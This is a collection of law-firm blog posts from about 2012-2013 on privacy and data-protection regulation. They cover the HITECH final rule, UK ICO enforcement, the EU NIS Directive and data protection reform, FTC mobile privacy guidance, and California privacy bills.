The proposed amendment requires companies to respond to a consumer’s request by providing a copy of all the personal information that they hold about that individual, as well as the names and contact information for all third parties with which the company has shared the information during the previous 12 months. In doing so, it seeks to bring back aspects of the legislation that were included in the original Shine the Light bill, but were omitted prior to its passage in 2005.

Moreover, the proposed amendment also seeks to address failed attempts by the plaintiffs’ bar to file lawsuits, including class actions, under the Shine the Light law by specifically stating that a violation of these obligations would be “deemed to constitute an injury to a customer.” Several class actions brought under Shine the Light have been dismissed based on the plaintiffs’ inability to demonstrate any economic injury. The amendment responds to these rulings and entitles consumers to specified remedies, including civil penalties.

Long-Awaited HITECH Final Rule is Here

This post was written by Brad M. Rostolsky, Nancy E. Bonifant, Salvatore G. Rotella, Jr., Elizabeth Doyle O'Brien, Jennifer Pike and Zachary A. Portin.

After much anticipation, the Office for Civil Rights of the United States Department of Health and Human Services published the HITECH Final Rule on January 25, 2013. The final regulation contains substantive and technical modifications and additions to the HIPAA Privacy, Security, Enforcement, and Breach Notification Rules.

For a more detailed analysis, please click here to read the issued Client Alert.

UK First-Tier Tribunal Dismisses Appeal Against Information Commissioner's Monetary Penalty Notice

This post was written by Cynthia O'Donoghue.

The First-Tier Tribunal (General Regulatory Chamber, Information Rights) has dismissed the first appeal against a Monetary Penalty Notice issued by the UK Information Commissioner’s Office (ICO) for a serious violation of the Data Protection Act 1998 (DPA). The ICO had issued the Central London Community Healthcare NHS Trust (the Trust) with a Monetary Penalty Notice of £90,000 for repeatedly faxing sensitive patient data relating to its palliative care unit to an incorrect fax number. The ICO issued the notice for a breach of the seventh Data Protection Principle, which requires the implementation of appropriate technical and organisational security measures.

The Trust appealed the penalty on the basis that the ICO erred in law when it issued the monetary penalty, as the Trust had gone through an ICO assessment following the self-reported breach. Under the DPA, an organisation that goes through an ICO assessment cannot be issued a penalty notice based on the outcome of that assessment. The ICO had argued that it would be absurd not to issue a monetary penalty notice where there was a serious breach of the DPA merely because an organisation had self-reported. The tribunal found that the process undergone by the Trust following its report of the breach was not an “assessment” but an investigation, notwithstanding that the Trust worked with the ICO to remediate its procedures. So as not to diminish the incentive to self-report, the tribunal did emphasise in its analysis that the ICO takes organisations’ self-reporting into account when the level of the fine is assessed.

When issuing Monetary Penalty Notices, the ICO typically exercises its discretion by discounting the penalty by 20% if the fine is paid within a set time period. Prior to the hearing, the Trust had offered to pay £72,000 (the sum applicable under the early payment discount scheme) on the basis that the payment would be without prejudice to its right to appeal and would be refunded by the ICO if the appeal succeeded; the ICO refused. The Trust raised this on appeal, arguing that the ICO should have exercised its discretion differently rather than putting the Trust in the position of either paying the discounted amount and forgoing the appeal, or appealing and forfeiting the discount. The tribunal refused to treat the discount as having been preserved during the appeal process, since the discount scheme is intended to encourage early payment and early resolution, finding that as the Trust chose not to accept those terms, it was “its loss” when the appeal failed.

The tribunal’s ruling illustrates the importance of the procedure undertaken by the ICO when issuing Monetary Penalty Notices, and that the risk of appeal and loss of any incentive to resolve a matter expediently rests with the party deciding to appeal.

The UK Financial Services Authority is heading up a cybersecurity review of 30 major financial institutions

This post was written by Cynthia O'Donoghue.

On Monday, 11 February, Greg Clark, Financial Secretary to the UK Treasury, announced in the House of Commons that the Financial Services Authority (“FSA”) will head up a new government benchmarking scheme regarding cybersecurity for the UK financial services sector.

The financial sector has come under increased scrutiny in recent months, with the European Central Bank recommending that banks, credit card companies and other payment service providers be required to put in place multiple layers of security to make it harder for hackers to infiltrate internet payment systems.

The FSA review will cover 30 major financial institutions and include input from the Treasury, the Bank of England and other government departments and agencies to assess cybersecurity practices, and will culminate in an updated Business Continuity Management Practice Guide and a discussion paper.

The aim of the review is to raise awareness of cyber risks and promote cybersecurity in the finance sector, which should encourage better security aimed at preventing cyber threats. The review will also seek to cover correction techniques by detailing effective business continuity models for organisations.

This new scheme underscores the attention cybersecurity is getting within Europe, and the Guide is likely to complement or even inform the security measures anticipated by the European Commission’s draft Directive on Network and Information Security (“NIS”) (see our blog on the NIS Directive) that would require banks, stock exchanges and organisations from a range of other sectors to adhere to a set of common, minimum information security standards and impose an obligation to notify national regulators of cases where they experience significant cyber breaches.

Spanish Data Protection Authority's New Outsourcing Model Clauses for Service Providers Subcontracting Outside the EEA

This post was written by Cynthia O’Donoghue and Katalina Chin.

In December 2012, the Spanish Data Protection Authority (SPDA) published a new set of Model Clauses prepared purely for use by service providers that subcontract to companies located in countries outside the EEA.

These new Model Clauses (based on the 2010 controller-to-processor clauses) will allow for an international transfer of personal data from a data processor (data exporter) established in Spain to a subprocessor (data importer) based in a country that does not ensure an adequate level of protection in the field of personal data, within the context of an outsourcing arrangement.

The current sets of EU Model Clauses available are drafted from a data controller’s perspective, in that the data controller is principally responsible for compliance requirements, such as, in Spain, obtaining prior authorisation for transfers from the SPDA. Historically, that meant that the company that outsourced the services to the prime contractor was still responsible for obtaining SPDA authorisation for the international data transfer to each subcontractor.

Now, Spanish service providers acting as data processors can enter into Model Clauses directly with their subprocessors and initiate the prior authorisation process themselves with the SPDA to request approval of an international transfer of their client’s personal data for processing by their subcontractors located outside the EEA.

These new Model Clauses should facilitate data processing within a supply chain by allowing outsource service providers to engage subcontractors outside the EEA, serve as evidence to customers of their data protection compliance and ultimately market their services in a more competitive fashion. The Spanish DPA has clearly responded to the demands of the outsourcing sector by providing a more flexible method of covering processor-to-subprocessor data exports and helping to eliminate some of the regulatory barriers that place EU processors at a competitive disadvantage with their non-EEA competitors.

The Privacy Battle Continues between Germany's ULD and Facebook

This post was written by Dr. Thomas Fischl and Katharina Weimer.

One more chapter in the never-ending story of Facebook and ULD, the data protection authority of Schleswig-Holstein, has been written. Last week, a German administrative court decided that, contrary to ULD’s official order, Facebook cannot be forced to permit the use of pseudonyms by its users.

While the ULD was sure that Facebook’s real name policy violated the German Telemedia Act (which expressly provides that users must be allowed to use nicknames online), the court did not necessarily disagree, but took a different route in reaching its decision. ULD’s orders were issued against Facebook Inc., in the U.S., and Facebook Ireland Limited, which is responsible for all of Facebook's activities outside of the U.S. and Canada. According to Facebook’s submission to the court, the existing German Facebook subsidiary (Facebook Germany GmbH) merely handles marketing and acquisition for the local market and does not process any personal information. The court found that since Facebook Ireland Limited processes all user information, then based on § 1 (5) sentence 1 of the German Federal Data Protection Act, as construed in accordance with Art. 4 (1) a) of Directive 95/46/EC, Irish data protection laws apply, and not German laws.

This is a strong blow to the ULD. Thilo Weichert, Privacy Commissioner and head of the ULD, commented that “the decisions are more than amazing,” especially because, in his view, Facebook Ireland does not process any personal data itself either; this is done by Facebook Inc.

He announced that the ULD would appeal the decision to avoid the development of a one-stop-shop system. By establishing a main office in an EU member state with a low level of data protection, oversight in other countries could be avoided easily if the national entities remain ignorant of any data processing taking place.

We will keep you posted about any further developments.

FTC Speaks About Its Mobile Privacy Disclosures Guidance

This post was written by Paul Bond and Frederick Lah.

On February 1, the FTC released its Mobile Privacy Disclosures Guidance (the Guidance) setting forth best practice recommendations for platforms, app developers, third parties such as ad networks and analytics companies, and app trade associations. We previously wrote about the Guidance when it was issued.

On February 15, Assistant Director in the FTC’s Division of Privacy and Identity Protection, Chris Olsen, spoke at the latest National Telecommunications and Information Administration (NTIA) stakeholders’ meeting in Washington, DC about the Guidance. Here are some highlights from the meeting:

  • Olsen started off the meeting by recapping the recent efforts by the FTC in the mobile space.
  • He said that the FTC believes that consumers are not really aware of the types of information collection and sharing practices that are taking place.
  • He described the mobile ecosystem as “complex” and that all the players in the ecosystem need to work together for its improvement.
  • Olsen spoke about the specific roles and responsibilities of all the players in the ecosystem (app platforms, app developers, and ad networks) as outlined in the Guidance (many of which we described in our previous blog article).
  • According to Olsen, the Guidance was designed to do three things: (1) spur members of the ecosystem to take a more active role in addressing the lack of sufficient disclosures; (2) reach as many industry participants as possible in the “diverse marketplace” and educate participants on what the best practices are; and (3) provide input to industry stakeholders, such as the NTIA, on the development of a code of conduct for the mobile space.
  • One commentator noted that the Guidance sets out what industry participants should be doing, but does not seem to set out what the role of the FTC should be. Olsen responded by saying that, “the FTC needs to do better, too.” He specifically identified enforcement and outreach as areas for improvement.
  • With respect to the Guidance’s recommendations for platforms, Olsen stressed the need for platforms to be clear to consumers about what they’re doing (or not doing) and to oversee and enforce their developer agreements.
  • Olsen pointed out that the Guidance does not set forth legal requirements and that the FTC did not issue the Guidance with the goal of providing any sort of legal framework. He did note though that Congress is interested in the issue and that they will continue to hold hearings about the state of affairs in the mobile environment, and that the FTC would provide input to Congress if called upon to do so.
  • As for the use of icons in the mobile space, Olsen said that he thinks that an essential element of any icon program must be that it “communicates a clear message” and is not ambiguous.
  • He also noted that the recent report from the California AG’s office on mobile privacy is largely consistent with the FTC’s Guidance, but noted that the California report appears to cover a larger scope of mobile privacy issues, one not just focused on the issue of disclosures.

Olsen’s comments and the Guidance itself are informative, but it remains to be seen how the players in the ecosystem will respond to the recommended best practices. Another open question is what effect, if any, the Guidance will have on the FTC’s enforcement efforts. We’ll be monitoring this situation closely.

Cybersecurity Executive Order and CISPA to Solve Cyber Threat?

This post was written by Timothy J. Nagle and Mark S. Melodia.

On February 12, the executive order “Improving Critical Infrastructure Cybersecurity” was issued, accompanied by a Presidential Policy Directive as well as a mention from President Obama in the State of the Union address. Similar to the previously discussed November 2012 draft, the executive order addresses: improvements in information sharing between the public and private sectors; application by implementing agencies of the Fair Information Practice Principles; development by the National Institute of Standards and Technology of a “Cybersecurity Framework” of standards, methodologies and processes that are consistent with voluntary international standards; an invitation to the private sector to participate in a voluntary critical infrastructure Cybersecurity Program; and identification of critical infrastructure at greatest risk.

The need to address the cyber threat is directly reflected in the executive order as well as in the recently introduced Cyber Intelligence Sharing and Protection Act (CISPA). Information sharing is the main focus of CISPA, which provides liability and other protections covering the use or dissemination of information shared by the private sector and eases some of the restrictions on sharing sensitive or classified government information.

Please click here to read the issued Client Alert.

Deadline for Comments on Fred Meyer Guides Extended by FTC

This post was written by Keri S. Bruce.

The deadline to provide comments to aid the Federal Trade Commission (FTC) in its review of the Fred Meyer Guides (Guides) was reopened and extended until March 4, 2013. The Guides clarify the Robinson-Patman Act (Act) by explaining how manufacturers and wholesalers can provide advertising allowances and other promotional payments and services to retailers in a manner that does not violate the Act’s prohibition on anti-competitive price discrimination.

Please click here for more information on our sister blog, Adlaw by Request.

EU Proposed Directive on Network and Information Security

This post was written by Cynthia O'Donoghue, Timothy J. Nagle and Christine E. Nielsen.

On 7 February, the European Commission published an EU Cyber Security Strategy encompassing a proposed Directive on Network and Information Security. The aim of the Strategy and Directive is to ensure a secure and trustworthy digital environment while promoting and protecting fundamental rights, including data protection, democracy and the rule of law. The proposed NIS Directive contains many of the same elements found in the critical infrastructure/cybersecurity program currently existing in the United States; however, extending the security obligations as proposed greatly exceeds the reach of U.S. critical infrastructure programs, and essentially leaves no private business outside the reach of the Directive. The Directive asserts, without providing any real evidence for the assertion, that all of these new requirements will impose no additional costs, given the existing requirement under national data protection legislation to maintain appropriate security measures to protect personal data. The NIS Directive contains many laudable provisions, including the principal purpose that Member States should create strategies and competent authorities to supervise cyber risk to critical infrastructure and implement consistent cybersecurity efforts across the EU. This would aid in the creation of emergency response efforts, the sharing of information and the harmonisation of law enforcement investigations. However, the breadth and scale of the effort contemplated by the NIS Directive may impede progress. The addition of prescriptive requirements on “market operators” will almost certainly lead to the same contentious debate that has pervaded the effort to pass national cybersecurity legislation in the United States. In addition, the insertion of a sanction regime will only add to the difficulties in getting the Directive passed by the European Parliament. Given that security is scalable and risk dependent, sanctions should arise not merely because a breach occurred, but only where the risk has been negligently assessed or recklessly disregarded.

Please click here to read the issued Client Alert.

California's Proposal to Require Privacy Policies Be No More Than 100 Words: Simplifying or Complicating the Process?

This post was written by Paul Bond and Frederick Lah.

A California state assemblyman proposed legislation this week attempting to require that online privacy policies be no more than 100 words. The legislation would also require that the privacy policy “be written in clear and concise language, be written at no greater than an 8th grade reading level, and to include a statement indicating whether the personally identifiable information may be sold or shared with others, and if so, how and with whom the information may be shared.” This legislation, if passed, would serve to amend California’s Online Privacy Protection Act, which applies to every operator of a website or online service directed to consumers in California.

Common sense and good business practice dictate that privacy policies be as comprehensible and as concise as possible. Most companies, however, will almost certainly find this 100-word limitation to be simply unworkable, especially given the requirement that there be statements about how personally identifiable information is sold, to whom it is sold and with whom it is shared. That disclosure alone, even if written as clearly and concisely as possible, could easily exceed 100 words. At the very least, every privacy policy should also include details about what type of information is collected, how it is collected, and how it is used, as well as any additional content required by applicable federal laws like COPPA and GLBA.

In a day and age when the FTC and even the California AG have gone after companies for insufficient disclosures, a 100-word limitation would seem to conflict with this increasing demand from regulators for companies to have more complete disclosures. Forcing companies to comply with a strict word count, rather than emphasizing “plain language” solutions, would seem to miss the point. It’s also important to understand that the average length of an online privacy policy is 2,500 words, according to a 2008 study. Even this short blog article (which contains more than 350 words) would be way too long as a privacy policy under the proposed legislation. Obviously, unnecessarily verbose privacy policies are not the answer, but we think the same can be said for word limitations.

BlackBerry Policing Apps To Ensure Compliance With Privacy Policies

This post was written by Paul Bond, Lisa B. Kim, and Frederick Lah.

In the midst of all the recent attention on mobile apps and their privacy challenges, BlackBerry has unveiled a new “privacy notice” service that alerts customers about apps that “don’t clearly or adequately inform users about how the app is accessing and possibly managing customers’ data.” According to BlackBerry, these notices will “provide information about an application's behavior in order for customers to make an informed decision about whether to continue using the app.” In addition, the notices will provide information to users on how to remove the app.

As an example, BlackBerry issued its first “privacy notice” to NumberBook, a caller ID app. After conducting an investigation into the app, BlackBerry determined that in addition to identifying callers, NumberBook, unbeknownst to the user, was collecting the user’s contact list and GPS location, and had the ability to send text messages from the user’s device. This did not comply with BlackBerry’s privacy and mobile app guidelines because it did not provide sufficient notification to users about what information was uploaded from their device or how it was used or shared with third parties, nor did it seek consent from the user’s contacts before it disclosed their phone numbers to other NumberBook users. So BlackBerry removed the app from its App World store and issued an alert to BlackBerry owners who had previously downloaded the app.

BlackBerry’s new “privacy notice” service offers a technical solution designed to meet the increasing demand from regulators that apps provide better disclosures to consumers about the app’s privacy practices. Other companies, such as Facebook, have opted to respond to this increasing demand from regulators by agreeing to participate in the “Ad Choices” self-regulatory program, which applies to both mobile web and mobile app advertisements. Interestingly, BlackBerry's service was unveiled the same day that the FTC released its latest report on mobile privacy disclosures, which we previously covered here. As regulatory pressure continues to build from both the FTC and the states, namely California, it will be interesting to see how other app developers and platform providers in the mobile space will respond.

Reed Smith Addressing Big Data Risks in E-Discovery and ESI

This post was written by Mark S. Melodia and Frederick Lah.

On Thursday, February 7, 2013 (1 p.m. EST), Reed Smith attorney Mark Melodia will serve as a guest speaker for a webcast on "Big Data Converging with Legal, Information Governance and Regulatory Requirements.” The webcast will be hosted by Exterro, Inc., an e-discovery software solutions provider.

Leading companies in nearly all industries are gathering unprecedented types and quantities of data in order to better understand their customers and monetize the results, but the existence of these complex data sets has potential costs and challenges as well: how can this information be kept secure, what happens in the case of a breach, and how do ESI preservation and retrieval obligations change in a Big Data context? Mark will be addressing some of these important questions, alongside other professionals in the Big Data and e-discovery fields from Ernst and Young and TERIS.

To register for this webcast, please click here.

FTC Tries The Carrot and The Stick: Releases Guidance on Mobile Privacy Best Practices; Enters Into $800K Consent Order with Path

This post was written by John P. Feldman, Paul Bond and Christine E. Nielsen.

Today, the Federal Trade Commission released detailed guidance on privacy in the mobile environment, at the same time announcing its largest-ever settlement with an app developer for alleged privacy violations. Combined with aggressive action on mobile privacy issues by the California attorney general’s office, Mobile Privacy Disclosures provides every company associated with a mobile app with an urgent reason to review all disclosures and practices.

Please click here to continue reading this Client Alert.

UK Supreme Court upholds disclosure order to name individuals who advertised sales of international rugby match tickets

This post was written by Cynthia O'Donoghue.

On 21 November, in Rugby Football Union v Viagogo Ltd [2012] UKSC 55, the UK Supreme Court upheld the Court of Appeal's order for the disclosure of the identities of individuals who had used an online ticketing website to sell and purchase international rugby tickets at inflated prices in breach of the Rugby Football Union’s (RFU) ticket terms and conditions.

The appellant, an online ticket-selling company called Viagogo, argued that complying with a Norwich Pharmacal Order (which requires the disclosure of documents relating to third parties) would involve a breach of Article 8 of the Charter of Fundamental Rights of the European Union, which grants the right to the protection of personal data. The lower courts had issued the order requiring Viagogo to disclose the documents to the RFU because the RFU had an arguable case of breach of contract and trespass, and had no alternative means of discovering the identities of the individuals who used Viagogo to sell Six Nations rugby match tickets.

In claiming that disclosure of the ticket sellers’ names and addresses would breach their data protection rights, Viagogo asked the Supreme Court to evaluate the impact on each of the individuals on a case-by-case basis against the value to the RFU of receiving their personal data, rather than any wider possible value, such as deterring others from selling or buying rugby tickets via similar websites.

The Supreme Court rejected Viagogo’s argument that the examination should be conducted narrowly, ruling that courts must also take into account the broader context. The court emphasised that an individual’s personal data can be disclosed where it is necessary and proportionate, and where an “intense focus” on the rights of individuals does not lead to the conclusion that the individuals whose data will be disclosed will have been “unfairly or oppressively treated” in all the circumstances after a careful weighing of all relevant factors. In upholding the disclosure order, the Supreme Court took into account the RFU's desire to prevent the future sale of tickets for international matches at inflated prices, and the fact that the order might deter individuals from breaching the RFU ticket terms.

The Supreme Court also stated that any disclosure of individuals' personal data under a Norwich Pharmacal order will always require consideration of how the individual will be affected and that “in some limited instances,” individuals’ data protection rights “may displace the interests” of the party seeking disclosure even where that party has no immediately feasible alternative means of obtaining the information.

The case demonstrates that individuals’ interests in their personal data may be overridden where there are competing rights and where, given the wider context, the disclosure is proportionate.

The UK Information Commissioner's Office publishes report on new cookie rules compliance activity

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner's Office (ICO) has published a report detailing compliance with the cookie rules and consumer concerns about the use of cookies, following the changes under the Privacy and Electronic Communications (EC Directive) (Amendment) Regulations 2011 (PECR), which require consent, more transparent notice and an opt-out.

In response to more than 550 consumer complaints about implied consent mechanisms and the lack of information provided by website operators, the ICO began surveying website operators on cookie compliance in May 2012. The ICO contacted more than 100 website operators, informing them about the reported consumer concerns and asking them to ensure they are compliant. The ICO’s survey showed that more than half of these website operators had either taken limited compliance steps or no steps at all.

The ICO surveyed UK websites it considered to be among the 200 most visited and found that while many had taken steps to comply, most were not considered to be fully compliant, and of the 200, only one site had failed to take any steps at all. The ICO issued that website operator with a deadline for compliance.

The report illustrates that the majority of websites taking significant steps to make users aware that cookies are in use, and to obtain the necessary consent, are using banners and relying on implied consent. The ICO’s guidance requires informed consent, which in turn requires website operators to provide users with clear and relevant information. The information should be clear enough for users to understand when cookies are necessary because of a user’s request for content or services and, alternatively, when cookies are optional and a user may opt out.

The ICO was encouraged that “few popular sites appear to fall into the category of not seeking consent to use cookies,” but warned that it is contacting more non-compliant website operators, will continue to monitor compliance, and will use its regulatory powers, including monetary penalties, against companies failing to comply with PECR.

UK Committee of Advertising Practice rules for the use of online behavioural advertising

This post was written by Cynthia O'Donoghue.

The UK Committee of Advertising Practice (CAP), which writes and maintains the UK Advertising Codes, has introduced new rules for organisations conducting online behavioural advertising (OBA), to provide greater transparency and choice to consumers. The new rules will be incorporated into the UK Code of Non-broadcast Advertising, Sales Promotion and Direct Marketing, will come into force 4 February 2013, and will apply to third-party providers of OBA services and not to website owners.

CAP believes that by properly informing consumers about OBA and providing them with greater choice, consumers will be more inclined to receive tailored advertisements. The rules require organisations conducting OBA to provide a clear and comprehensive notice about what web viewing behaviour data they are collecting, either within or around the subsequently displayed tailored advertisement. The notice must also give users an opportunity to opt out of the OBA-related data collection. The rules will be enforced by the UK Advertising Standards Agency.

Organisations that use technology to collect and use information about all or substantially all websites that are visited by web users on a particular computer in order to deliver OBA must obtain the user’s explicit consent before collecting the data. CAP has also stipulated that OBA must not be used to target children under the age of 12.

The new rules are part of an initiative to establish a European industry-wide self-regulatory standard supported by an EU Industry Framework on OBA. Organisations that sign up to the Framework would be permitted to use an interactive icon that can be placed on advertisements. The icon is sponsored by the European Interactive Digital Advertising Alliance (EDAA), which was founded by a European advertising industry coalition. The icon provides information about how and why the advertisement was targeted and delivered to the web user, and provides them with an opt-out mechanism.

The new OBA rules are separate from, although they may assist in part with compliance with, the e-Privacy Directive requirement to obtain consent before placing cookies on a user’s device, which is enforced by the UK Information Commissioner’s Office.

Viviane Reding Addresses the Progress of the Proposed Data Protection Framework Reform

This post was written by Cynthia O’Donoghue.

In a speech at the EC Justice Council meeting in Dublin on 18 January 2013, Viviane Reding, European Commissioner for Justice, Fundamental Rights and Citizenship, demonstrated her commitment to continuing the “good progress” made on the EU Proposed Data Protection Framework (Proposed Framework). Her comments focused on three topics being debated at the meeting: the household exemption, the right to be forgotten, and tougher fines.

Reding first emphasised that the household exemption, which exempts individuals who process data as part of a purely personal activity, was a necessary part of the proposed General Data Protection Regulation, but that to modernise it for the digital age, it should only apply where the individual has no gainful interest. This approach would change current business practices in which individuals are incentivised to provide their contact lists to social networks or other e-commerce sites.

Reding stressed that the right to be forgotten is an important method of providing individuals with control over their personal data. Responding to criticism that it would be difficult, if not impossible, to remove all personal data from the Internet, Reding suggested a pragmatic approach whereby companies are not obliged to remove all traces of data, but must at least inform third parties processing the data of any erasure request made by an individual.

Reding also advocated that fines needed to be tougher to be more of a deterrent; fines in the Proposed Framework can be up to 2% of worldwide annual turnover. Several voices, including the Irish, who hold the current EU Presidency, have instead questioned the appropriateness of the penalties in the Proposed Framework, and are arguing that data protection authorities should be given discretion and flexibility in how penalties are issued.

In addition, Reding expressed strong support of the Albrecht report, reiterating that a modern and uniform set of data protection rules is good for growth within the EU and could save up to €2.3 billion per year, a figure which was recently criticized by the UK Government for being over-inflated.
 

EU and U.S. sign joint declaration to make Internet safer for children

This post was written by Cynthia O'Donoghue.

EU Commission Vice-President Neelie Kroes, responsible for the Digital Agenda for Europe, and U.S. Secretary of Homeland Security Janet Napolitano, have signed a joint Declaration to “work collectively and in partnership to reduce the risks and maximise the benefits of the Internet for children.” The declaration demonstrates a mutual recognition by the United States and the EU of the need to establish appropriate safeguards to strengthen cyber security, and will complement the EU "Strategy for a Better Internet for Children."

The declaration sets out plans to create joint U.S./EU campaigns, with the U.S. Department of Homeland Security scheduled to participate in the EU Safer Internet Day 5 February 2013. The joint campaigns will seek to improve cybersecurity and focus on international cooperation between industry, public authorities, schools, and civil society to ensure a global audience.

According to the European Commission, 75% of children between the ages of 6 and 17 routinely use the Internet, and the declaration sets out three main objectives to protect children online:

  1. Increase awareness of risks and improve skills of children, and engage parents and teachers to help enable best use of the Internet by collaborating on cybersecurity awareness
  2. Work with industry, law enforcement and other stakeholders to ensure that Internet content and services can be trusted, and parents and children can make informed choices
  3. Cooperate in fighting online child sexual exploitation and abuse

The EU and U.S. have historically worked together to combat cybercrime and have established an EU-U.S. Working Group on Cybersecurity and Cybercrime, and it is this existing collaboration that has led to this “key milestone.”

European Commission may propose Directive requiring disclosure of security breaches

This post was written by Cynthia O'Donoghue.

The European Commission has proposed a “digital to-do list” which sets out seven new priorities for the digital economy and society. Included in the proposal is a strategy and proposed Directive to prevent and counter cybercrime. Proposed by Neelie Kroes, the European Union’s Commissioner for the digital agenda, the draft Directive is expected to impose data breach notification and disclosure requirements on any company that runs large databases, including Internet search providers, social networks, e-commerce sites or cloud services. The Directive would harmonise national laws across Europe, where there is currently no overarching data breach law. Currently, only a few Member States have implemented data breach notification requirements, each with different approaches as to who should be notified, and the threshold requirements to trigger such notifications.

This new digital Directive, however, has, at best, the potential to overlap with or, at worst, conflict with the draft EU General Data Protection Regulation, which requires organisations to report data breaches within 24 hours to the "lead" data protection authority where it has its main European operations, as well as to each individual whose data has been compromised. Right now the only EU-wide data breach notification requirement stems from the ePrivacy Directive, and applies only to ISPs and telecoms providers.

The proposed new data breach obligation has the potential to cover a wide array of industries, possibly leading to notification fatigue. Liam Benham, a vice president in charge of governmental programs at IBM Europe, suggested that the reporting requirements should be limited to operators of critical infrastructure, like power grids, financial networks and transport systems.

There is clearly a need for ensuring that companies are not overburdened by notification requirements, and that any notification obligation does not either overlap or conflict with other obligations, or thwart the overall objective of reducing cybercrime.

FFIEC Proposes Social Media Risk Management Guidelines

This post was written by Timothy J. Nagle, John P. Feldman, and Frederick Lah.

Earlier this week, the Federal Financial Institutions Examination Council (“FFIEC”) released its proposed guidance requesting comment on the applicability of consumer protection laws to the social media activities of financial institutions. The guidance addresses the potential risks associated with the use of social media by financial institutions.

Financial institutions use social media in a variety of ways, including marketing products, interacting with customers, facilitating applications for accounts, inviting feedback, and providing customer incentives. Social media is defined by the FFIEC as a “form of interactive online communication in which users can generate and share content through text, images, audio, and/or video.” This includes micro-blogging sites, forums, blogs, customer review websites and bulletin boards, photo and video sites, sites that enable professional networking, virtual worlds, and social games.

In the report, the FFIEC describes the compliance, reputational and operational risks to financial institutions when participating in social media activities. Since the various laws applicable to financial institutions do not contain exceptions for social media, the FFIEC expects financial institutions to comply with the laws applicable to all products or services they make available or administer via social media, including deposit and lending products (e.g., Truth in Savings Act, Fair Lending Laws, Fair Housing Act, Truth in Lending Act), payments (e.g., Electronic Fund Transfer Act), and collection of customer information (e.g., Gramm-Leach-Bliley Act, CAN-SPAM, Telephone Consumer Protection Act, COPPA, Fair Credit Reporting Act). The reputation risk can be significant and can include the adverse impact of dissatisfied customer comments on proprietary pages or unrelated “gripe sites,” and the attendant negative publicity. The proposed guidance also notes that activities related to the use of customer information via social media may draw negative reactions from customers from a privacy standpoint. Also, employees may post communications on their own social media accounts about the financial institution, which may reflect poorly on the financial institution. Of particular note, the report recommends that financial institutions use social media monitoring tools and techniques to identify and respond to comments or complaints, fraudulent use of the institution’s brand (e.g. phishing), or “any active discussion of the institution on the Internet.” As with all banking activities, operational risk, which involves the risk of loss resulting from inadequate or failed processes, people, or systems, must also be considered. All employees, especially those who represent the financial institution in customer service, account support or marketing roles, must be well trained on the appropriate use of social media when interacting with the public and customers.

To address these risks, the FFIEC says that financial institutions should have a social media risk management program in place that encompasses:

  • A governance structure with clear roles and responsibilities, which should include senior management directing how the use of social media contributes to the financial institution’s strategic goals
  • Policies and procedures regarding the use and monitoring of social media, and compliance with all applicable consumer protection laws
  • A due diligence process for selecting and managing third-party service providers who offer social media services
  • An employee training program focused on social media use
  • An oversight process for monitoring information posted to social media sites

Under the guidance, even institutions that have chosen not to use social media need to be prepared to respond to negative social media publicity, while also providing guidance to employees on business-related social media activities.

The FFIEC is inviting comments on all aspects of the proposed guidance. Specifically, the FFIEC is soliciting comments in response to the following questions:

  • Are there other types of social media, or ways in which financial institutions are using social media, that are not included in the proposed guidance but that should be included?
  • Are there other consumer protection laws, regulations, policies or concerns that may be implicated by financial institutions’ use of social media that are not discussed in the proposed guidance, but that should be discussed?
  • Are there any technological or other impediments to financial institutions’ compliance with applicable laws, regulations, and policies when using social media of which the FFIEC should be aware?

Financial institutions should review their current and expected future social media presence in light of this proposed guidance. They should also evaluate their internal social media, marketing, privacy, Internet and customer-service policies for consistency with the FFIEC release, and to guide any comments they intend to submit to the FFIEC. Industry participants have 60 days from the date that the notice is published in the Federal Register to submit comments. Please contact the authors for assistance in submitting a comment.

Rapporteur Jan Philipp Albrecht presents report on the European Commission's proposed Data Protection Regulation

This post was written by Cynthia O'Donoghue.

On January 10, 2013, Jan Philipp Albrecht, the rapporteur to the EU Parliament’s Committee on Civil Liberties, Justice and Home Affairs (“LIBE”), presented his draft report (the “Report”) proposing amendments to the European Commission’s proposed Data Protection Regulation (the “Proposed Regulation”).

Albrecht’s amendments to what was already a complex and prescriptive piece of draft legislation have received mixed reviews from government and industry. The UK recently voiced its criticism of the current proposals, while the European Data Protection Supervisor (EDPS) reacted positively to Albrecht’s report, indicating that it was impressed with the changes made, as they included many of the EDPS and Article 29 Working Party recommendations.

Albrecht has recommended significant alterations to the most contentious provisions, such as the definition of personal data, consent, the rights of access, portability and to be forgotten, and the 24-hour breach notification. Albrecht has sought to simplify the legal framework while also strengthening individuals’ rights.

The definition of personal data includes data that would single a person out, either from data held alone or when used in “combination with associated data,” and seeks to clarify uses of pseudonymised data and create a definition for anonymous data that prevents identification of a person, where identification, directly or indirectly, would require a “disproportionate amount of time, expense and effort.”

Albrecht believes consent “is the best way for individuals to gain more control over data processing activities,” and his proposed amendments require consent to be explicit, freely given, specific, informed, and obtained through "clear affirmative action," since pre-ticked boxes cannot be seen to express free consent.

The right of access would now include the ability to obtain information about profiling and whether a governmental authority had requested data, as well as whether an organisation had complied with that request. The right of portability would be amended to be part of the right of access, so that copies of data are provided in a format that can be migrated to another service.

In relation to the right to be forgotten, Albrecht includes a provision for erasure if there are no legitimate grounds to retain the data. This aims to ensure that companies that have transferred data to third parties without a legitimate legal basis do actually erase the data. Viviane Reding, in a speech at the EC Justice Council meeting in Dublin 18 January 2013, endorsed this “ambitious and pragmatic” approach as being necessary to prevent imposing unreasonable obligations on businesses.

Responding to the perceived short time limit of 24 hours for notifying the National Supervisory Body of personal data breaches initially proposed by the European Commission, Albrecht suggests extending the time frame to 72 hours.

Albrecht also recommends more onerous notification requirements, with data controllers required to use a multi-layered approach including easily understandable, icon-based descriptions for different types of processing.

Albrecht also recommends that organisations’ ability to rely on the legitimate interest basis for processing data be limited to “exceptional circumstances,” where it would be possible for the data controller’s interests to override the fundamental rights and freedoms of data subjects.

Other amendments proposed by Albrecht include replacing the criterion for mandatory appointment of a data protection officer (DPO) from being based on having more than 250 employees, to processing the data of 500 individuals or more per year. This means that even small companies and start-ups would incur this expense.

In its recent response to the UK Justice Select Committee’s opinion on the Data Protection framework proposals, the UK Ministry of Justice found mandatory appointments of DPOs unnecessary and suggested that data controllers should be encouraged to appoint DPOs “if they were felt necessary to ensure compliance with the proposed Regulation.” Both the UK Ministry of Justice and the UK Justice Select Committee have been highly critical of the proposed Regulation, finding it overly prescriptive and likely to increase costs to the UK economy by between £100 million and £360 million per annum; the UK Government would likely view Albrecht’s amendments even more harshly, since the UK would like to see the draft Regulation recast as a Directive to allow Member States a degree of flexibility.

